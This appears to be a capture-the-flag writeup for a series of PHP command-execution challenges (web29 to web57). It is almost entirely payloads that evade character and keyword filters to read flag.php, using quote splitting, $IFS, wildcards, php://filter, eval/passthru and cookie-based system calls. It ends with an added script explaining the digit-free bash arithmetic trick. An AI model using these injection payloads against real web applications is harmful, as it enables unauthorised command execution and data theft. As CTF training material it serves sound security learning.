Command Execution
by Firebasky
web29
echo `nl fl''ag.php`;
View the page source
web30
echo `nl fl''ag.p''hp`;
View the page source
web31
show_source(next(array_reverse(scandir(pos(localeconv())))));
c=$a=show_source($_GET[1])?>&1=flag.php
c=eval($_GET[1])?>&1=system('cat flag.php');
c=?><?=`$_GET[1]`;&1=cat flag.php
View the page source
c=?><?=passthru($_GET[1]);&1=cat flag.php
View the page source
web32
c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web33-36 are the same
c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
For web36, change the parameter name to the letter a
web40
show_source(next(array_reverse(scandir(pos(localeconv())))));
GXYCTF's "禁止套娃" challenge
Pass the argument in through a cookie to get command execution
c=session_start();system(session_id());
passid=ls
web41
See 羽师傅's writeup
web42
payload:
cat flag.php%0a
View the page source
web43
nl flag.php%0a
View the page source
web44
nl fla*.php%0a
View the page source
web45
echo$IFS`tac$IFS*`%0A
web46
nl<fla''g.php||
View the page source
web47-51
Same as web46
web52
nl$IFS/fla''g||
web53
c''at${IFS}fla''g.p''hp
web54
/bin/?at${IFS}f???????
web55
https://blog.csdn.net/qq_46091464/article/details/108513145
https://blog.csdn.net/qq_46091464/article/details/108557067
web56
https://blog.csdn.net/qq_46091464/article/details/108513145
web57
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
${_} = ""   // $_ expands to the last argument of the previous command (empty here)
$((${_}))=0
$((~$((${_}))))=-1
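The arithmetic behind the web57 expression, checked step by step. This is an added example, not part of the original writeup. The function names and the block counts (1, 2, 5, 37) are constructed for illustration, and bash is assumed to be installed.

```shell
# Added example: each $((~$(()))) expands to -1. N of them side by side read
# as "-1-1...-1" = -N, and the outer ~ turns that into ~(-N) = N - 1.
NEG1='$((~$(())))'   # literal text of one building block

# build_expr N: the expression shape from the notes with N building blocks.
build_expr() {
    n=$1; body=''
    while [ "$n" -gt 0 ]; do
        body="$body$NEG1"
        n=$((n - 1))
    done
    printf '%s' "\$((~\$(($body))))"
}

# count_terms EXPR: number of -1 building blocks in EXPR (no evaluation).
count_terms() {
    rest=$1; n=0
    while :; do
        case $rest in
            *"$NEG1"*) rest=${rest#*"$NEG1"}; n=$((n + 1)) ;;
            *) break ;;
        esac
    done
    echo "$n"
}

# predict EXPR: value obtained by reasoning alone, N blocks -> N - 1.
predict() {
    echo $(( $(count_terms "$1") - 1 ))
}

# evaluate EXPR: let bash expand it. This executes EXPR, so only pass
# strings produced by build_expr, never untrusted input.
evaluate() {
    bash -c "echo \"$1\""
}

# Constructed sample sizes (not taken from the page).
for n in 1 2 5 37; do
    e=$(build_expr "$n")
    echo "blocks=$n predicted=$(predict "$e") bash=$(evaluate "$e")"
done
```

Because the expression contains no digits or letters, a filter that only rejects those characters still lets a numeric argument through; the counting function shows the value can be recovered from the text without running it.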